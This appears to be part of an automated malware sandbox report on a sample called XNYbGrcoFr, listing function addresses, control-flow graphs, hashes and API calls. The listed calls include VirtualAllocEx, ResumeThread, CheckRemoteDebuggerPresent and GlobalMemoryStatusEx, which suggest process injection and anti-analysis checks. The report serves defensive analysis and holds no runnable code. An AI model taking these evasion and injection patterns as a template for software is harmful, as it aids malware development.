                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 52ba5b60fd77001e8a7a8e119fca25e23e0fb4891c091d79732d11e1b7396709
                                                  • Instruction ID: 8d29359e6ceb1f24279c45f9de607553e688c922fe23c79c19fb34f72378a50e
                                                  • Opcode Fuzzy Hash: 52ba5b60fd77001e8a7a8e119fca25e23e0fb4891c091d79732d11e1b7396709
                                                  • Instruction Fuzzy Hash: 912124759002499BDB10DFAAC9446DEBBF6AB88324F20841AE919AB250CB799511CFA0
                                                  Function 0273A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 278 273a870-273b2e8 280 273b2f0-273b31f LoadLibraryExW 278->280 281 273b2ea-273b2ed 278->281 282 273b321-273b327 280->282 283 273b328-273b345 280->283 281->280 282->283
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0273B101,00000800,00000000,00000000), ref: 0273B312
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: e4c5560d5f27842a3beab78a0ba9894be9ea4f9d88c097f1cee7195a7b0c233b
                                                  • Instruction ID: d3883c268f1885d0d0d36166e5c92e87b672091d9ef6940a3f3b418307d8c299
                                                  • Opcode Fuzzy Hash: e4c5560d5f27842a3beab78a0ba9894be9ea4f9d88c097f1cee7195a7b0c233b
                                                  • Instruction Fuzzy Hash: 461114B69003499FDB10CF9AC544A9FFBF4FF88324F10852AE919A7201C3B5A544CFA0
                                                  Function 06A17280 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 286 6a17280-6a172fb VirtualAllocEx 289 6a17304-6a17329 286->289 290 6a172fd-6a17303 286->290 290->289
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A172EE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 4bb5045782e3d6e81a8ac573937dd9a070df0f94a70252a9e09c6e33a7982746
                                                  • Instruction ID: 997faa90b6b25d2748fdf2d2a38d64344aa7c60e19a57ba752e4ad5fef34a88e
                                                  • Opcode Fuzzy Hash: 4bb5045782e3d6e81a8ac573937dd9a070df0f94a70252a9e09c6e33a7982746
                                                  • Instruction Fuzzy Hash: 781156768003499FDF10DFAAC844BDEBBF5AF88320F108419E519AB250C779A510CFA0
                                                  Function 06A16CB8 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: afce0ae5a6b1fa4d06c2166de9624ccc66fb2a4cf250931a7e3ebb98b4117e4a
                                                  • Instruction ID: 2d6edd7f8d3836d109d0898dcbb882e652a68ef076a36d32f827d00895673aa7
                                                  • Opcode Fuzzy Hash: afce0ae5a6b1fa4d06c2166de9624ccc66fb2a4cf250931a7e3ebb98b4117e4a
                                                  • Instruction Fuzzy Hash: 39115BB19007498FDB20DFA9C4857EEFBF4EF88324F248419D519A7240C7796504CF94
                                                  Function 0273B2A1 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0273B101,00000800,00000000,00000000), ref: 0273B312
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 2e38f6325d12ef6f8110127470220ec9a0d3e38db22a63598c64ff75e239d198
                                                  • Instruction ID: 433c2613629ce15a4a04ef58baa03b383c7e606d4df3298d621c31892e1f6e8b
                                                  • Opcode Fuzzy Hash: 2e38f6325d12ef6f8110127470220ec9a0d3e38db22a63598c64ff75e239d198
                                                  • Instruction Fuzzy Hash: 691120B6900309CFDB14CF9AD584ADEFBF5FB88324F10842AD519A7200C3B8A549CFA0
                                                  Function 06A16CC0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: d8d39ef38065192c85af0f0759f87d04902096822d589a471bf516fd77d93021
                                                  • Instruction ID: d143e95488d87c27a11537a33c6b3ea7e429cad7e1441d84ff6214ce0ac93ac7
                                                  • Opcode Fuzzy Hash: d8d39ef38065192c85af0f0759f87d04902096822d589a471bf516fd77d93021
                                                  • Instruction Fuzzy Hash: FF1136B1D007498FDB20DFAAC84579EFBF8AF88724F248419D519A7240CB79A944CFA5
                                                  Function 06A176D0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A1B01D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: e33b099be2e2eb28d8e05cf9735c8c1d00e990846af5456048b33f79bf9bc7ff
                                                  • Instruction ID: f891dd07e722d06f9d2ccb4aae18efebc6644ad92ad3f536cc98d90e83fd7359
                                                  • Opcode Fuzzy Hash: e33b099be2e2eb28d8e05cf9735c8c1d00e990846af5456048b33f79bf9bc7ff
                                                  • Instruction Fuzzy Hash: A11103B5800749DFDB50DF9AC988BDEBBF8FB48724F108419E568A7210C3B5A944CFA5
                                                  Function 0273B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0273B086
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: c3c2878102ed7a2207b77aeae15450bd589a04ee5b761dd4e76cf6e13eb54202
                                                  • Instruction ID: 4e7e293309e93b051b791406d37b95365239f0ba884e24bf6309af032d02a672
                                                  • Opcode Fuzzy Hash: c3c2878102ed7a2207b77aeae15450bd589a04ee5b761dd4e76cf6e13eb54202
                                                  • Instruction Fuzzy Hash: FF110FB6C007498FCB20CF9AC544B9EFBF4FB88628F10842AD428A7210C379A545CFA1
                                                  Function 06A1AFB9 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A1B01D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: 6cd6adc7f6b3af1e9b59b37d8b29505ec8b6489670196b669d500114c6f8a8ac
                                                  • Instruction ID: 4377519282d91d649fce6d6841e5d4335d590be2618836e6999de241244caffc
                                                  • Opcode Fuzzy Hash: 6cd6adc7f6b3af1e9b59b37d8b29505ec8b6489670196b669d500114c6f8a8ac
                                                  • Instruction Fuzzy Hash: 141122B58003499FCB10DF99D984BDEBFF8EB48320F108409E558A7210C375AA44CFA1
                                                  Function 0249D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165359135.000000000249D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0249D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_249d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf8ec5fa235798e7b1a20ece3dbd5437318375c5f85a5629d737ea7452340e55
                                                  • Instruction ID: 7a551959d513739988dde512c4f5685747e904965131c27d70bf25e8300fde72
                                                  • Opcode Fuzzy Hash: bf8ec5fa235798e7b1a20ece3dbd5437318375c5f85a5629d737ea7452340e55
                                                  • Instruction Fuzzy Hash: EF21FF75A04200EFDF14EF24D984B26BFA1EB84318F20C56AD90A0B356C37AD447CE61
                                                  Function 0249D1D4 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165359135.000000000249D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0249D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_249d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 006c918f3bff5692ffbcff57616a6e65a1d49b3f984bc54432103c68897dbfe8
                                                  • Instruction ID: 3ed462949a1e569179858ebe2e0cd3b126fa82a88b278e63efc1624413a4af78
                                                  • Opcode Fuzzy Hash: 006c918f3bff5692ffbcff57616a6e65a1d49b3f984bc54432103c68897dbfe8
                                                  • Instruction Fuzzy Hash: 1021CF75904204EFDF05EF14D980B26BFA5FB88314F20C56EE90A4F292C776D446CA61
                                                  Function 0249D006 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165359135.000000000249D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0249D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_249d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ea2232efd025f794ab9795d0a970bd8dd66190c196cca474210469d46a6247b
                                                  • Instruction ID: ef7455b2996e3cf3532e140bd0fd796c5343b094e48e82358b8b255586084c14
                                                  • Opcode Fuzzy Hash: 6ea2232efd025f794ab9795d0a970bd8dd66190c196cca474210469d46a6247b
                                                  • Instruction Fuzzy Hash: 3C218E755093C0CFDB06DF24D994716BF71EB46218F28C5DBD8498B2A7C33A980ACB62
                                                  Function 0249D1CF Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165359135.000000000249D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0249D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_249d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction ID: c301cbffb35e81779f06a5b331a4bcd5312667bf394ebd226b80945e96b1c3a4
                                                  • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                  • Instruction Fuzzy Hash: 23118B75904284DFCB15DF10D6C4B16BFA1FB84218F24C6AAD8494F7A6C33AD44ACB61
                                                  Function 0248D745 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165291242.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_248d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c25301867199c1f798f9064842ee7617c4c67de8ebf19af0407661a307b7015
                                                  • Instruction ID: d9b72fda34b9cd3f90b98b4c12a88288d88039d1a96db9188a5deca9637cfd07
                                                  • Opcode Fuzzy Hash: 4c25301867199c1f798f9064842ee7617c4c67de8ebf19af0407661a307b7015
                                                  • Instruction Fuzzy Hash: FB012B75816B44DAE7106E35CDC4B2FBF98DF41364F08C51BEE094A2C6C7B99481CA71
                                                  Function 0248D744 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165291242.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_248d000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e10759914d72b1cf677fb1e6da8d51a86a1d2f385afe8f93d9bf02f4649c3632
                                                  • Instruction ID: 7f66304bfc1d0514a07b1e36b37ca842d6d66134d41ccd58f79e9c63aa0bb703
                                                  • Opcode Fuzzy Hash: e10759914d72b1cf677fb1e6da8d51a86a1d2f385afe8f93d9bf02f4649c3632
                                                  • Instruction Fuzzy Hash: 32F062754057449EE7109E1AD9C8B67FF98EB81674F18C45BED084A286C3799844CBB1

                                                  Execution Graph

                                                  Execution Coverage:13.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:22
                                                  Total number of Limit Nodes:5
                                                  execution_graph 27129 1227ec0 27130 1227f04 CheckRemoteDebuggerPresent 27129->27130 27131 1227f46 27130->27131 27132 122099b 27133 122091b 27132->27133 27134 122084e 27132->27134 27134->27133 27136 1221382 27134->27136 27137 1221396 27136->27137 27138 12214a6 27137->27138 27140 1228c80 27137->27140 27138->27134 27141 1228c8a 27140->27141 27142 1228ca4 27141->27142 27145 6cef58f 27141->27145 27150 6cef5a0 27141->27150 27142->27137 27146 6cef5a0 27145->27146 27147 6cef7c6 27146->27147 27148 6cefbe0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27146->27148 27149 6cefbf0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27146->27149 27147->27142 27148->27146 27149->27146 27151 6cef5b5 27150->27151 27152 6cef7c6 27151->27152 27153 6cefbe0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27151->27153 27154 6cefbf0 GlobalMemoryStatusEx GlobalMemoryStatusEx 27151->27154 27152->27142 27153->27151 27154->27151

                                                  Executed Functions

                                                  Function 06CE2358 Relevance: 1.5, Instructions: 1477COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0a3cbe8e8d6df7e168f9e3846823b8c4b921d6175033fe8ed9abff7bb399a100
                                                  • Instruction ID: f75410ca6e00fe3f1a49db65b3703815e7938b9774b8bac610cc645da4330b2a
                                                  • Opcode Fuzzy Hash: 0a3cbe8e8d6df7e168f9e3846823b8c4b921d6175033fe8ed9abff7bb399a100
                                                  • Instruction Fuzzy Hash: BFD25B30E00255CFDB64DF64C484B9DB7B6FF85310F54896AD40AAB265EB79EE81CB80
                                                  Function 06CE6170 Relevance: .8, Instructions: 820COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6035d61da8c409d964cb57ba62b3fd8d0be831c15dc2cfaab7cd3288f7e3d5dd
                                                  • Instruction ID: cea2ea172d10f8b7f55430abcafe399ba484df1e4311d6fce763a1e879fbbddf
                                                  • Opcode Fuzzy Hash: 6035d61da8c409d964cb57ba62b3fd8d0be831c15dc2cfaab7cd3288f7e3d5dd
                                                  • Instruction Fuzzy Hash: E262BB30F202058FDB54DB69D494AADBBB2FF98314F148969E406EB391DB75ED42CB80
                                                  Function 06CEB1A0 Relevance: .8, Instructions: 768COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcff6a88df1df12cb2fea4f3450b57b5e70361c8447090bae373ec32944c1a3d
                                                  • Instruction ID: 1f8c75be6131eae1bd3974ed1f9f0f01070449249c5552954867c4537b73623b
                                                  • Opcode Fuzzy Hash: fcff6a88df1df12cb2fea4f3450b57b5e70361c8447090bae373ec32944c1a3d
                                                  • Instruction Fuzzy Hash: 1D525E30E002098FEF64DBA8D6947BDB7B6FB85310F20852AE405EB355DA75DD81CB91
                                                  Function 06CEC100 Relevance: .6, Instructions: 637COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 89816441f6c6032c590d8a62ef563549bb62899132d5fc9cd505fe3bde6cc80c
                                                  • Instruction ID: f9b711bc567520264ee751872149f525434daa8b03fdc681d5a158c3cc7518c3
                                                  • Opcode Fuzzy Hash: 89816441f6c6032c590d8a62ef563549bb62899132d5fc9cd505fe3bde6cc80c
                                                  • Instruction Fuzzy Hash: 72326E34B102059FDB54DF68D890BAEBBB2FB89310F108529E515EB391DB39ED81CB91
                                                  Function 06CE5158 Relevance: .6, Instructions: 583COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 292e744a5934d5ab42bbb66ea9c417c04ecc722c9b48a39304963bbfde51d034
                                                  • Instruction ID: c6d1af0112c16d2c6b1e5d4c2e2b0ff833ffa1f20fe7a0aa0f232f0b325ef2a1
                                                  • Opcode Fuzzy Hash: 292e744a5934d5ab42bbb66ea9c417c04ecc722c9b48a39304963bbfde51d034
                                                  • Instruction Fuzzy Hash: EE12F331F102159BDB64CFA4D8807AEB7B2FB84314F64843AE856DB345DA76ED42CB90
                                                  Function 06CE78F0 Relevance: .5, Instructions: 472COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 98b34fd2c33c2e9ea29d499ed1fcb426973fe4fe1a268c829f0aac42ee43d33c
                                                  • Instruction ID: 158cb74382e14eb0f6dc3826c9be0b0365f1167796ce1e83722b37b916370245
                                                  • Opcode Fuzzy Hash: 98b34fd2c33c2e9ea29d499ed1fcb426973fe4fe1a268c829f0aac42ee43d33c
                                                  • Instruction Fuzzy Hash: C7026F30B002168FDB54DF64E494AAEB7B2FF84310F148969E506AB355DB75ED42CBE0
                                                  Function 01227EB8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 597 1227eb8-1227f44 CheckRemoteDebuggerPresent 599 1227f46-1227f4c 597->599 600 1227f4d-1227f88 597->600 599->600
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01227F37
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4535786761.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_1220000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: d7effa786a6ad1b5d3ea09dd3658241267c22cd42f62e9ddc6a986028cf03909
                                                  • Instruction ID: c2c808273ce589fc9b77ff90778e4ac58ff5673f486ca53555a7617f1c468ab9
                                                  • Opcode Fuzzy Hash: d7effa786a6ad1b5d3ea09dd3658241267c22cd42f62e9ddc6a986028cf03909
                                                  • Instruction Fuzzy Hash: C02146B2804259DFCB10CF9AD484BEEBBF4AF48320F14842EE945A3250C778A944CF60
                                                  Function 01227EC0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 603 1227ec0-1227f44 CheckRemoteDebuggerPresent 605 1227f46-1227f4c 603->605 606 1227f4d-1227f88 603->606 605->606
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01227F37
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4535786761.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_1220000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: a40f5db156417392439e89e43e96249164ee1bc6ebb3d42caf4c331e7a301e75
                                                  • Instruction ID: f00450f6bd0b0ac53679a4a7ca52cb4ead7aa0c6e16e96ae97cd709652c2075c
                                                  • Opcode Fuzzy Hash: a40f5db156417392439e89e43e96249164ee1bc6ebb3d42caf4c331e7a301e75
                                                  • Instruction Fuzzy Hash: 80215C71804259CFDB00CF9AD444BEEFBF4BF48310F14845AE555A7250D778A944CF60
                                                  Function 0122F2F7 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 609 122f2f7-122f384 GlobalMemoryStatusEx 613 122f386-122f38c 609->613 614 122f38d-122f3b5 609->614 613->614
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0122F377
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4535786761.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_1220000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 18963d9affd8e063e515146c58b89306247cecd97154308fe66bffc7ded15e49
                                                  • Instruction ID: 1ffb71e6d1c292f5463a84ac703e36fa453632d9cc38f47c3dde0dc330b12e71
                                                  • Opcode Fuzzy Hash: 18963d9affd8e063e515146c58b89306247cecd97154308fe66bffc7ded15e49
                                                  • Instruction Fuzzy Hash: 4D2158B1C00659DFCB10CFAAD444BDEFBB4BF48310F10825AE514A7250D778A954CFA1
                                                  Function 0122F310 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 617 122f310-122f384 GlobalMemoryStatusEx 619 122f386-122f38c 617->619 620 122f38d-122f3b5 617->620 619->620
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0122F377
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4535786761.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_1220000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 1b5cb7fc1dd542c2717485214173e49e642a4d4aa3e59b08872b461bbeaed554
                                                  • Instruction ID: 58ff7f999ffdd92b407dbe1d2bce075c27d7c4938515185caf86868f82ab8907
                                                  • Opcode Fuzzy Hash: 1b5cb7fc1dd542c2717485214173e49e642a4d4aa3e59b08872b461bbeaed554
                                                  • Instruction Fuzzy Hash: D711E2B1C0065ADBDB10CF9AC544BDEFBF4BF48720F14826AE918A7240D778A954CFA5
                                                  Function 06CEFE40 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1219 6cefe40-6cefe6e 1232 6cefe71 call 6ceff18 1219->1232 1233 6cefe71 call 6ceff09 1219->1233 1220 6cefe77-6cefe96 1224 6cefe9e-6cefec8 1220->1224 1227 6cefeca-6cefee7 1224->1227 1228 6cefee9 1224->1228 1229 6cefefb-6ceff02 1227->1229 1228->1229 1232->1220 1233->1220
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
                                                  • API String ID: 0-2343686810
                                                  • Opcode ID: 61af04863537e3f2c810e899e70d9342f800d2520245e7a07fc102cd1ae4f25d
                                                  • Instruction ID: 3becffd8718499a488a4c1d4af7c3d92099e16968529aecdd20e5ec4f96b65fc
                                                  • Opcode Fuzzy Hash: 61af04863537e3f2c810e899e70d9342f800d2520245e7a07fc102cd1ae4f25d
                                                  • Instruction Fuzzy Hash: 85116A75B102149FDB54DF78D8057AEBBF1AF4C600F144469EA1AE73A0EB38A9018B80
                                                  Function 06CEFE50 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1234 6cefe50-6cefe6e 1235 6cefe77-6cefe96 1234->1235 1247 6cefe71 call 6ceff18 1234->1247 1248 6cefe71 call 6ceff09 1234->1248 1239 6cefe9e-6cefec8 1235->1239 1242 6cefeca-6cefee7 1239->1242 1243 6cefee9 1239->1243 1244 6cefefb-6ceff02 1242->1244 1243->1244 1247->1235 1248->1235
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000E.00000002.4550444371.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_14_2_6ce0000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |
